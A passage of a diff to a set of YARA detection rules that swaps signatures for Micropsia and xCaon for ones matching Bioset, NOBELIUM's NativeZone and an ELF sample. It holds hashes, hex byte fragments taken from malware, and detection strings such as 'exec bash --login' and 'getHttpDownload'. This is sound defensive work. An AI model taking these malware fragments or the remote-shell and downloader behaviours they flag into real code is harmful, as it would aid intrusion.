+		logic_hash = "de737f051d34edb2219e77c0d4f0239b95bad9983ee5e435d6ee9741525816f0"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "d9b938d89a13620aabe81e0a9d02778cad8658cbfd6f15e7dab47b1118b53237"
-		hash2 = "42f40fb2e4f971807fcb771c9aacc5a2361fdcdaf3eaafc31b22096d81dd0666"
-		level = "experimental"
+		hash1 = "0bff46518b35ddfe37f4a7820286aab829d81f1480d9eeca5aaedc9ceda6724f"
+		hash2 = "be97d7ae3b2d876f027d99d8d61dbca92513f4975336c2ebc26cf8a0839b67b6"
+		tlp = "White"
+		adversary = "Specter"
 
 	strings:
-		$code1 = { 8d 45 f8 8b 15 90 c7 69 00 e8 1e 05 d5 ff c7 45 d0 00 00 00 00 c7 45 d4 00 00 00 00 8b 45 d8 8b 58 5c 85 db 74 22 8b c3 8b 10 ff 12 52 50 8b 45 d8 8b 40 5c e8 af 4b db ff 29 04 24 19 54 24 04 58 5a 89 45 d0 89 55 d4 6a 04 8d 45 d8 50 6a 2d 8b 45 d8 8b 80 a4 00 00 00 50 e8 59 cd ff ff c7 45 c4 02 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 3b cd ff ff c7 45 c4 01 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 1d cd ff ff 33 c0 5a 59 59 64 89 10 68 aa df 6b 00 8b 45 e8 e8 a0 }
-		$code2 = { 6a 00 8b 45 d0 50 6a 00 6a 00 6a 00 6a 00 8b 45 d8 8b 80 a4 00 00 00 50 e8 d1 cc ff ff 85 c0 75 19 8b 15 50 a7 6e 00 8b 4d e8 8b 45 ec e8 9c fc }
-		$code3 = { 8d 4d f4 8b 45 d4 8b 40 0c ba 01 00 00 00 8b 18 ff 53 0c 8b 45 d4 8b 50 10 a1 bc 1c 6f 00 e8 82 bc ff ff 8b 55 f4 a1 bc 1c 6f 00 e8 75 bc ff ff 8b 45 f4 ba f4 7c 6d 00 e8 a0 4c d3 ff 0f 85 cf 00 00 00 ba 08 7d 6d 00 a1 bc 1c 6f 00 e8 53 bc ff ff 33 c0 55 68 9a 76 6d 00 64 ff 30 64 89 20 33 c0 89 45 dc 8d 55 9c b8 38 7c 6d 00 e8 7b 86 d5 ff ff 75 9c 68 50 7c 6d 00 8d 55 98 b8 09 00 00 00 e8 c6 c4 ff ff ff 75 98 68 60 7c 6d 00 8d 45 dc ba 04 00 00 00 e8 91 4b d3 ff e8 c4 22 d5 ff dd 5d c0 9b ff 75 c4 ff 75 c0 8d 4d e0 8b 15 30 ab 6e 00 b8 70 7c 6d 00 e8 97 32 d5 ff 8b 45 d4 83 c0 14 }
-		$s1 = { 4a 00 50 00 45 00 47 00 20 00 49 00 6d 00 61 00 67 00 65 00 20 00 46 00 69 00 6c 00 65 00 25 00 53 00 63 00 68 00 65 00 6d 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 25 00 73 }
-		$s2 = "Download start ." fullword wide
-		$s3 = "application/x-msdownload" fullword wide
-		$s4 = "Start Download File" fullword wide
-		$s5 = "getHttpDownload" fullword ascii
-		$s6 = "Download start ." fullword wide
-		$s7 = "-start" fullword wide
-		$s8 = "-Winapi.ImageHlp" fullword ascii
-		$s9 = "postHttpDownload" fullword ascii
+		$s1 = { 41 57 41 89 cf 41 56 4d 89 c6 41 55 41 89 f5 be 01 00 00 00 41 54 49 89 fc bf 02 00 00 00 55 89 d5 31 d2 53 48 83 ec 38 48 c7 44 24 20 00 00 00 00 48 c7 44 24 28 00 00 00 00 e8 cf bf fe ff be 03 00 00 00 89 c3 89 c7 31 c0 e8 1f c4 fe ff 80 cc 08 be 04 00 00 00 89 df 89 c2 31 c0 e8 0c c4 fe ff 48 8d 74 24 20 89 ea 89 df 66 c1 ca 08 66 89 54 24 22 ba 10 00 00 00 66 c7 44 24 20 02 00 44 89 e8 31 ed 0f c8 89 44 24 24 e8 ae be fe ff 85 c0 0f 84 c5 00 00 00 e8 11 c0 fe ff 83 38 73 48 89 c5 74 07 89 df e8 12 b8 fe ff 8b 6d 00 83 fd 73 0f 85 a5 00 00 00 bf 1c 00 00 00 e8 dc b9 fe ff 48 85 c0 48 89 c2 0f 84 8c 00 00 00 44 89 68 14 89 58 18 4d 8d 6c 24 60 44 89 78 10 41 0f 10 06 4c 89 ef 4d 8d 74 24 50 0f 11 02 0f 29 04 24 48 89 04 24 e8 74 c2 fe ff bf 18 00 00 00 e8 b2 b5 07 00 48 85 c0 74 17 48 8b 14 24 48 c7 00 00 00 00 00 48 c7 40 08 00 00 00 00 48 89 50 10 4c 89 f6 48 89 c7 e8 9b fe 08 00 4c 89 ef e8 0b c3 fe ff 41 8b bc 24 88 00 00 00 48 8d 4c 24 14 89 da be 01 00 00 00 89 5c 24 18 c7 44 24 14 1d 20 00 80 e8 26 bd fe }
+		$s2 = { 55 31 c0 b9 5d 00 00 00 53 48 89 fb 48 81 ec 48 01 00 00 48 8d 7c 24 4e f3 aa 48 8d 7c 24 4e e8 d2 03 00 00 48 8d bc 24 ab 00 00 00 31 c0 b9 07 00 00 00 48 8d 74 24 28 c7 44 24 30 00 00 00 00 48 c7 44 24 38 00 00 00 00 f3 ab 48 8b 84 24 70 01 00 00 48 8d 7c 24 4e 48 89 44 24 40 48 8d 44 24 30 48 89 44 24 28 e8 36 08 00 00 8b 6c 24 30 85 ed 0f 85 89 00 00 00 48 8b 44 24 40 48 8b 00 48 8b 40 e8 48 39 44 24 38 75 76 48 8d bc 24 c7 00 00 00 31 c0 b9 5d 00 00 00 f3 aa 48 8d bc 24 c7 00 00 00 e8 4d 03 00 00 48 8d bc 24 24 01 00 00 b9 07 00 00 00 89 e8 48 8d 94 24 c7 00 00 00 48 8d 74 24 4e f3 ab 48 8d 7b 18 e8 64 26 00 00 b9 08 00 00 00 48 89 e7 48 8d b4 24 60 01 00 00 f3 a5 48 8d b4 24 c7 00 00 00 89 c2 48 89 df e8 6e fb ff ff 48 8d bc 24 c7 00 00 00 e8 e3 03 00 00 48 8d 7c 24 4e e8 d9 03 00 00 48 81 c4 }
+		$s3 = { 83 fa 03 0f 86 e6 00 00 00 41 57 41 56 41 55 41 54 49 89 cc 55 48 89 fd 53 48 89 f3 48 83 ec 28 66 8b 46 04 44 8b 76 0c 44 8b 3e 66 89 44 24 0c 66 8b 46 06 45 8d 6e 01 44 89 7c 24 08 44 89 74 24 14 66 89 44 24 0e 8b 46 08 4c 89 ef 89 44 24 10 e8 f4 b3 fe ff 48 89 c2 48 89 44 24 18 4c 89 e9 31 c0 48 89 d7 48 8d 73 10 f3 aa 48 89 d7 4c 89 f1 f3 a4 44 89 fe 48 89 ef e8 9b fa ff ff ff c0 74 07 4c 89 e1 31 d2 eb 4b 66 83 7c 24 0e 03 75 21 48 8b 74 24 18 48 8d 54 24 10 48 89 ef e8 d4 f8 ff ff 84 c0 75 0b e8 ad b9 fe ff 8b 00 85 c0 75 18 0f b7 54 24 0c 8b 4c 24 08 4d 89 e0 8b 74 24 10 48 89 ef e8 e1 f8 ff ff 83 f8 73 74 11 4c 89 e1 89 c2 8b 74 24 08 48 89 ef e8 ff fe ff ff 48 83 }
+		$s4 = { 48 8d 05 5a 5f 0b 00 48 89 84 24 80 00 00 00 48 8b 05 cf 75 30 00 be 18 00 00 00 bf 01 00 00 00 ff 10 48 85 c0 48 89 84 24 98 00 00 00 0f 84 fa fc ff ff 4c 8d bc 24 98 00 00 00 48 8b 54 24 60 48 8d 35 00 2b 0b 00 31 c0 4c 89 ff e8 2c ef ff ff 85 c0 0f 85 f4 fb ff ff 49 8b b5 f8 0d 00 00 48 85 f6 0f 84 13 09 00 00 31 ed 41 0f b7 86 ac 03 00 00 66 25 20 40 66 83 f8 20 0f 84 03 09 00 00 80 7c 24 78 00 0f 84 01 07 00 00 49 8b 8e 18 02 00 00 49 8b 96 10 02 00 00 4c 8d 46 06 48 8d 35 a6 2a 0b 00 4c 89 ff 31 c0 e8 ce ee ff ff 85 c0 0f 85 96 fb ff ff 41 0f b7 86 ac 03 00 00 4c 8d 25 42 eb 0a 00 66 25 20 40 66 83 f8 20 0f 84 55 0b 00 00 49 83 bd f8 0e 00 00 00 48 8d 05 25 eb 0a 00 74 0e 49 8b 96 30 04 00 00 48 85 d2 48 0f 45 c2 49 8b 95 68 0c 00 00 48 8d 35 07 eb 0a 00 48 85 d2 74 13 80 3a 00 74 0e 49 8b 96 18 04 00 00 48 85 d2 48 0f 45 f2 49 8b 96 50 04 00 00 48 8d 0d e1 ea 0a 00 48 85 d2 48 0f 44 d1 49 89 d3 48 8b 54 24 50 48 8b 52 20 48 85 d2 48 0f 44 d1 49 89 d2 49 8b 95 50 0d 00 00 48 85 d2 74 13 80 3a 00 74 0e 49 8b 96 10 04 00 00 48 85 d2 48 0f 45 ca 41 f6 85 85 15 00 00 02 48 8d 2d 96 ea 0a 00 74 0e 49 8b 96 28 04 00 00 48 85 d2 48 0f 45 ea 49 8b be 20 04 00 00 48 8d 15 78 ea 0a 00 4d 8b 8e 08 04 00 00 4d 8b 86 38 04 00 00 48 89 4c 24 10 48 8b 8c 24 80 00 00 00 48 89 74 24 28 48 8d 35 f6 23 0b 00 48 85 ff 4c 89 5c 24 20 4c 89 54 24 18 48 0f 44 fa 4d 85 c9 48 89 44 24 30 48 89 7c 24 60 48 8b 7c 24 70 4c 0f 44 ca 4d 85 c0 48 89 6c }
+		$s5 = { 8b 44 24 50 4d 85 ff 4c 89 38 0f 85 12 f8 ff ff e9 dc f9 ff ff 0f 1f 84 00 00 00 00 00 49 83 bd 68 0c 00 00 00 0f 84 bb f7 ff ff 48 8b 05 e3 6f 30 00 49 8b be 18 04 00 00 ff 10 49 8b b5 68 0c 00 00 48 8d 3d ae 26 0b 00 31 c0 49 c7 86 18 04 00 00 00 00 00 00 e8 22 9b 00 00 48 85 c0 49 89 86 18 04 00 00 0f 85 96 f7 ff ff e9 1d f9 ff ff 0f 1f 44 00 00 41 80 bd ea 0e 00 00 00 48 8d 05 01 26 0b 00 48 89 44 24 60 0f 88 2f f6 ff ff 83 fb 07 0f 87 2a 01 00 00 48 8d 05 76 28 0b 00 89 da 48 63 14 90 48 01 d0 ff e0 0f 1f 00 4c 8b 7c 24 50 49 8b 3f e8 e3 fa fe ff 85 c0 0f 85 eb f7 ff ff 49 8b 3f e8 f3 fa fe ff 49 89 47 08 e9 1e f9 ff ff 66 2e 0f 1f 84 00 00 00 00 00 49 8b b6 d0 00 00 00 49 8b bd f0 10 00 00 e8 5d cf 00 00 85 c0 0f 85 91 f9 ff ff 49 8b 86 d8 03 00 00 45 8b 86 98 01 00 00 8b 80 80 00 00 00 a8 02 74 0d 41 81 f8 bb 01 00 00 0f 84 b9 01 00 00 a8 01 74 0a 41 83 f8 50 0f 84 ab 01 00 00 41 0f b6 86 ad 03 00 00 48 8d 0d 2e e7 0a 00 48 8d 15 8a 1c 0b 00 48 8d 3d de 25 0b 00 48 89 ce 83 e0 02 48 8d 05 3c 07 0b 00 48 0f 45 ca 48 8b 54 24 58 48 0f 45 f0 31 c0 e8 14 9a 00 00 49 89 86 38 04 00 00 48 85 c0 0f 85 99 f9 ff ff e9 0f f8 ff ff 48 8d 05 05 25 0b 00 48 89 44 24 60 e9 2f f5 ff ff 48 8d 05 ef 24 0b 00 48 89 44 24 60 e9 1e f5 ff ff 48 8d 05 56 cd 0a 00 48 89 44 24 60 e9 0d f5 ff ff 48 8d 05 d6 24 0b 00 48 89 44 24 60 e9 fc f4 ff ff 48 8d 05 0e d1 0a 00 48 89 44 24 60 e9 eb f4 ff ff 66 2e 0f 1f 84 00 00 00 00 00 49 8b 86 d0 03 00 00 f6 80 80 00 00 00 03 74 28 8d 43 fd 83 f8 01 0f 86 6a 02 00 00 41 f6 85 eb 0e 00 00 01 74 12 49 83 bd f8 14 00 00 ff 0f 84 62 02 00 00 0f 1f 40 00 41 80 a5 68 06 00 00 bf 48 8d 05 44 e6 0a 00 41 f6 85 68 06 00 00 40 48 89 c1 48 8d 05 60 24 0b 00 48 0f 44 c1 48 89 44 24 70 e9 01 f8 ff ff 66 0f 1f 84 00 00 00 00 00 83 7f 18 04 4c 8d 3d f3 0a 0b 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and 2 of ( $code* ) and 5 of ( $s* )
+		uint32( 0 ) == 0x464c457f and filesize > 100KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_ELF_Bioset_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Micropsia used by APT-C-23 (Build 2018)"
+		description = "Detect the Bioset malware"
 		author = "Arkbird_SOLG"
-		id = "517a33bb-0214-588f-80e4-dc82f2552330"
-		date = "2021-03-31"
-		modified = "2021-03-31"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_1.yar#L1-L24"
+		id = "1b95c3df-7543-521c-a28b-d540ad0bd648"
+		date = "2021-07-02"
+		modified = "2021-07-05"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/Bioset/MAL_ELF_Bioset_Jul_2021_1.yara#L1-L26"
 		license_url = "N/A"
-		logic_hash = "69baab88d80ab15e08f3b08dfca45a1fee6c2e6077152906f391618713fac2ef"
-		score = 50
-		quality = 69
+		logic_hash = "b5ba7f4517f07d8657cbd54695cad88d8c2f263ee010bd70c4a05433b2927576"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60"
-		level = "experimental"
+		hash1 = "3afe2ec273608be0b34b8b357778cc2924c344dd1b00a84cf90925eeb2469964"
+		hash2 = "3de97c2b211285022a34a62b536cef586d987939d40d846930c201d010517a10"
+		hash3 = "b00157dbb371e8abe19a728104404af61acc3c5d4a6f67c60e694fe0788cb491"
+		hash4 = "7fa37dd67dcd04fc52787c5707cf3ee58e226b98c779feb45b78aa8a249754c7"
+		hash5 = "79e93f6e5876f31ddc4a6985b290ede6a2767d9a94bdf2057d9c464999163746"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$code1 = { c7 85 6c fc ff ff 12 00 00 00 8b f4 8d 85 6c fc ff ff 50 8d 8d 78 fc ff ff 51 ff 15 44 b0 66 00 3b f4 e8 80 d6 fa ff 8d 85 78 fc ff ff 50 b9 e0 83 66 00 e8 06 0d fb ff 6a 00 e8 24 0a 00 00 83 c4 04 50 e8 a2 d9 fa ff 83 c4 04 c7 85 60 fc ff ff }
-		$code2 = { 68 34 4f 61 00 8d 85 cc fd ff ff 50 e8 3d 02 fd ff 83 c4 08 8b f4 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff 15 60 b3 66 00 3b f4 e8 f2 0d fd ff 89 85 c0 fd ff ff 83 bd c0 fd ff ff 00 0f 84 49 03 00 00 8b f4 6a 00 6a 00 6a 03 6a 00 6a 00 0f b7 05 d4 83 66 00 50 8b 4d 10 51 8b 95 c0 fd ff ff 52 ff 15 58 b3 66 00 3b f4 e8 b3 0d fd ff 89 85 b4 fd ff ff 83 bd b4 fd ff ff 00 0f 84 f4 02 00 00 8b f4 6a 00 a1 d8 83 66 00 50 6a 00 6a 00 68 5c 4f 61 00 8b 4d 14 51 8d 95 cc fd ff ff 52 8b 85 b4 fd ff ff 50 ff 15 70 b3 66 00 3b f4 e8 6e 0d fd ff 89 85 a8 fd ff ff 83 bd a8 fd ff ff 00 0f 84 af 02 00 00 c7 85 9c fd ff ff 00 00 00 00 83 }
-		$code3 = { 8b 85 60 fc ff ff 83 c0 01 89 85 60 fc ff ff 83 bd 60 fc ff ff 0a 7d 2a e8 3f fc fa ff 99 b9 1a 00 00 00 f7 f9 83 c2 41 88 95 57 fc ff ff 0f b6 85 57 fc ff ff 50 b9 e0 83 66 00 e8 8b 14 fb }
-		$s1 = "szhttpUserAgent" fullword ascii
-		$s2 = "httpUseragent" fullword ascii
-		$s3 = "dwByteRead" fullword ascii
-		$s4 = { 25 59 25 6d 25 64 2d 25 49 2d 25 4d 2d 25 53 }
-		$s5 = { 53 45 4c 45 43 54 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 76 61 63 75 75 6d 5f 64 62 2e 27 20 7c 7c 20 73 75 62 73 74 72 28 73 71 6c 2c 31 34 29 20 20 46 52 4f 4d 20 73 71 6c 69 74 65 5f 6d 61 73 74 65 72 20 57 48 45 52 45 20 73 71 6c 20 4c 49 4b 45 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 25 27 }
-		$s6 = { 55 50 44 41 54 45 20 25 51 2e 25 73 20 53 45 54 20 73 71 6c 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 20 3d 20 27 74 72 69 67 67 65 72 27 20 54 48 45 4e 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 72 69 67 67 65 72 28 73 71 6c 2c 20 25 51 29 45 4c 53 45 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 61 62 6c 65 28 73 71 6c 2c 20 25 51 29 20 45 4e 44 2c 20 74 62 6c 5f 6e 61 6d 65 20 3d 20 25 51 2c 20 6e 61 6d 65 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 3d 27 74 61 62 6c 65 27 20 54 48 45 4e 20 25 51 20 57 48 45 4e 20 6e 61 6d 65 20 4c 49 4b 45 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 25 25 27 20 41 4e 44 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 54 48 45 4e 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 5f 27 20 7c 7c 20 25 51 20 7c 7c 20 73 75 62 73 74 72 28 6e 61 6d 65 2c 25 64 2b 31 38 29 20 45 4c 53 45 20 6e 61 6d 65 20 45 4e 44 20 57 48 45 52 45 20 74 62 6c 5f 6e 61 6d 65 3d 25 51 20 43 4f 4c 4c 41 54 45 20 6e 6f 63 61 73 65 20 41 4e 44 20 28 74 79 70 65 3d 27 74 61 62 6c 65 27 20 4f 52 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 4f 52 20 74 79 70 65 3d 27 74 72 69 67 67 65 72 27 29 3b }
-		$s7 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 }
-		$s8 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a }
+		$s1 = "exec bash --login" fullword ascii
+		$s2 = { 55 48 89 e5 53 48 83 ec 48 48 89 7d b8 48 c7 45 d8 [2] 40 00 48 c7 45 d0 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 eb 30 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 89 c7 e8 ?? fa ff ff 89 c2 8b 45 e8 01 d0 83 c0 01 89 45 e8 83 45 ec 01 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 85 c0 75 b4 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 83 ea 08 48 01 d0 48 8b 18 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 83 ea 08 48 01 d0 48 8b 00 48 89 c7 e8 ?? fa ff ff 48 83 c0 01 48 01 d8 48 89 45 d0 8b 45 e8 48 98 48 89 c7 e8 ?? fb ff ff 48 89 45 e0 c7 45 ec 00 00 00 00 eb 74 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 10 48 8b 45 e0 48 89 d6 48 89 c7 e8 ?? f9 ff ff 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 89 c7 e8 ?? f9 ff ff 89 45 cc 8b 45 cc 48 98 48 83 c0 01 48 01 45 e0 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 c2 48 8b 45 e0 48 89 02 83 45 ec 01 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 }
+		$s3 = "amcsh_connect" fullword ascii
+		$s4 = "GOT HAHA: %d" fullword ascii
+		$s5 = { 52 65 63 76 65 64 20 74 65 72 6d 20 65 6e 76 20 76 61 72 3a 20 25 73 00 77 69 6e 3a 25 64 2c 25 64 }
+		$s6 = { 55 48 89 e5 48 81 ec f0 20 00 00 89 bd 1c df ff ff 48 c7 45 f0 [2] 40 00 48 8d 85 20 df ff ff be 01 20 00 00 48 89 c7 e8 ?? fa ff ff 48 8d b5 28 ff ff ff 48 8d 85 2c ff ff ff 41 b8 00 00 00 00 b9 00 00 00 00 ba 00 00 00 00 48 89 c7 e8 ?? fa ff ff 85 c0 79 2a e8 ?? f8 ff ff 8b 00 89 c7 e8 ?? fa ff ff 48 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 26 fc ff ff b8 01 00 00 00 e9 f8 05 00 00 8b 85 28 ff ff ff 89 c7 e8 ?? fa ff ff 48 89 45 e8 48 83 7d e8 00 75 0a b8 01 00 00 00 e9 d6 05 00 00 bf [2] 40 00 e8 ?? f9 ff ff 48 8d 95 20 df ff ff 8b 85 1c df ff ff 48 89 d6 89 c7 e8 ?? 17 00 00 89 45 fc 83 7d fc 00 79 2a e8 [2] ff ff 8b 00 89 c7 e8 ?? fa ff ff 48 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 b0 fb ff ff }
+		$s7 = { 8b 45 fc 48 63 d0 8b 85 2c ff ff ff 48 8d 8d 20 df ff ff 48 89 ce 89 c7 e8 ?? f3 ff ff 89 45 fc 8b 45 fc 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 f0 f6 ff ff 83 7d fc }
+		$s8 = { 55 48 89 e5 53 48 81 ec e8 00 00 00 48 89 b5 48 ff ff ff 48 89 95 50 ff ff ff 48 89 8d 58 ff ff ff 4c 89 85 60 ff ff ff 4c 89 8d 68 ff ff ff 84 c0 74 23 0f 29 85 70 ff ff ff 0f 29 4d 80 0f 29 55 90 0f 29 5d a0 0f 29 65 b0 0f 29 6d c0 0f 29 75 d0 0f 29 7d e0 48 89 bd 18 ff ff ff 48 8b 05 [2] 20 00 48 85 c0 75 16 be [2] 40 00 bf [2] 40 00 e8 ?? fd ff ff 48 89 05 [2] 20 00 c7 85 20 ff ff ff 08 00 00 00 c7 85 24 ff ff ff 30 00 00 00 48 8d 45 10 48 89 85 28 ff ff ff 48 8d 85 40 ff ff ff 48 89 85 30 ff ff ff 48 8b 05 [2] 20 00 48 8d 95 20 ff ff ff 48 8b 8d 18 ff ff ff 48 89 ce 48 89 c7 e8 ?? fd ff ff 48 c7 85 38 ff ff ff [2] 40 00 48 8b 1d [2] 20 00 48 8b 85 38 ff ff ff 48 89 c7 e8 ?? fb ff ff 48 89 c6 48 8b 85 38 ff ff ff 48 89 d9 ba 01 00 00 00 48 89 c7 e8 ?? fd ff ff 48 8b 05 [2] 20 00 48 89 c7 e8 ?? fc ff ff 48 81 c4 e8 00 00 00 5b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and 2 of ( $code* ) and 5 of ( $s* )
+		uint32( 0 ) == 0x464c457f and filesize > 10KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Xcaon_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Nativezone_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect the xCaon malware"
+		description = "Detect NativeZone malware"
 		author = "Arkbird_SOLG"
-		id = "bcd5a52d-9547-5709-95f4-9d1f956f623c"
-		date = "2021-07-01"
-		modified = "2021-07-02"
-		reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_xCaon_Jul_2021_1.yara#L1-L21"
+		id = "5b858a8d-6e6a-5712-a83a-229bed1c7872"
+		date = "2021-05-28"
+		modified = "2021-06-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_NativeZone_May_2021_1.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "9c3e3d0035596323a505404ecc067bd2b87a4b0ac7499f1c87aac015f59eb65a"
+		logic_hash = "9281784100e922fe3ef64e7c112276ffa5f8691ab4f24f1b68fbb0495e449bd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b"
-		hash2 = "e9013f35ce11fc4c5eb2c21827bdc459202d362365d6ea5b724dee4fe0088bd1"
-		hash3 = "489fca69a622195328302e64e29b6183feac90826dce198432d603202ca4d216"
+		hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
+		hash2 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
 		tlp = "White"
-		adversary = "IndigoZebra"
+		adversary = "NOBELIUM"
 
 	strings:
-		$s1 = { a1 7c 10 41 00 33 c5 89 45 fc 8b 45 08 56 57 6a 49 89 85 f8 80 ff ff 58 6a 50 66 89 45 c8 58 6a 48 66 89 45 ca 58 6a 4c 66 89 45 cc 58 6a 50 66 89 45 ce 58 6a 41 66 89 45 d0 58 6a 50 66 89 45 d2 58 6a 49 66 89 45 d4 58 6a 2e 66 89 45 d6 58 6a 44 66 89 45 d8 58 66 89 45 da 6a 4c 58 66 89 45 dc 66 89 45 de 33 c0 66 89 45 e0 8d 45 c8 50 c7 45 e4 47 65 74 41 c7 45 e8 64 61 70 74 c7 45 ec 65 72 73 49 c7 45 f0 6e 66 6f 00 ff 15 50 d0 40 00 8d 4d e4 51 50 89 85 f4 80 ff ff ff 15 54 d0 40 00 8d 8d f0 80 ff ff 51 8d 8d fc 80 ff ff 51 c7 85 f0 80 ff ff 90 7e 00 00 ff d0 8b c8 33 c0 c6 45 f4 00 8d 7d f5 ab 66 ab aa 85 c9 0f 85 1d 01 00 00 53 6a 25 5e 6a 30 5a 6a 32 59 8b c6 66 89 45 8c 8b c2 66 89 45 8e 6a 58 8b c1 66 89 45 90 58 8b f8 6a 2d 66 89 7d 92 5f 8b df 66 89 5d 94 8b de 66 89 5d 96 8b da 66 89 5d 98 8b d9 66 89 5d 9a 8b d8 66 89 5d 9c 8b df 66 89 5d 9e 8b de 66 89 5d a0 8b da 66 89 5d a2 8b d9 66 89 5d a4 8b d8 66 89 5d a6 8b df 66 89 5d a8 8b de 66 89 5d aa 8b da 66 89 5d ac 8b d9 66 89 5d ae 8b d8 66 89 5d b0 8b df 66 89 5d b2 8b de 66 89 5d b4 8b da 66 89 5d b6 8b d9 66 89 45 c4 66 89 5d b8 8b d8 33 c0 66 89 45 c6 6a 06 8d 85 90 82 ff ff 50 8d 45 f4 50 66 89 5d ba 66 89 7d bc 66 89 75 be 66 89 55 c0 66 89 4d c2 e8 ?? 17 00 00 0f b6 45 f9 50 0f b6 45 f8 50 0f b6 45 f7 50 0f b6 45 f6 50 0f b6 45 f5 50 0f b6 45 f4 50 8d 45 8c 50 ff b5 f8 80 ff ff ff 15 44 d1 40 00 83 c4 2c 33 f6 46 5b ff b5 f4 80 ff ff ff 15 4c d0 40 00 8b }
-		$s2 = { 6a 5b 58 6a 55 66 89 45 c4 58 6a 70 66 89 45 c6 58 6a 6c 66 89 45 c8 58 6a 6f 66 89 45 ca 58 6a 61 66 89 45 cc 58 6a 64 66 89 45 ce 58 6a 5d 66 89 45 d0 58 6a 0d 66 89 45 d2 58 6a 0a 66 89 45 d4 58 6a 25 66 89 45 d6 33 c0 66 89 45 d8 58 6a 74 66 89 45 ac 8b c6 66 89 45 ae 58 6a 6d 66 89 45 b0 58 6a 70 66 89 45 b2 58 6a 25 66 89 45 b4 58 6a 64 66 89 45 b6 58 6a 2e 66 89 45 b8 58 6a 6c 66 89 45 ba 58 6a 6f 66 89 45 bc 58 6a 67 66 89 45 be 58 6a 46 66 89 45 c0 33 c0 66 89 45 c2 58 6a 69 66 89 45 dc 58 6a 6c 66 89 45 de 58 6a 65 66 89 45 e0 58 6a 3a 66 89 45 e2 58 66 89 45 e4 6a 25 58 66 89 45 e6 6a 0d 58 66 89 45 ea 6a 0a 58 66 89 45 ec 33 c0 66 89 45 ee 8d 45 c4 50 66 89 75 e8 e8 ?? 11 00 00 59 8d 4d c4 8d b5 50 f3 ff ff e8 [2] ff ff 89 bd 4c f2 ff ff c7 85 48 f3 ff ff 0f 00 00 00 89 bd 44 f3 ff ff c6 85 34 f3 ff ff 00 8d 85 34 f3 ff ff 50 83 ec 1c c6 45 fc 03 8d 85 fc f2 ff ff 8b f4 89 a5 50 f2 ff ff 50 e8 [2] ff ff e8 [2] ff ff 8b 9d 34 f3 ff ff 83 c4 20 83 bd 48 f3 ff ff 10 73 06 8d 9d 34 f3 ff ff 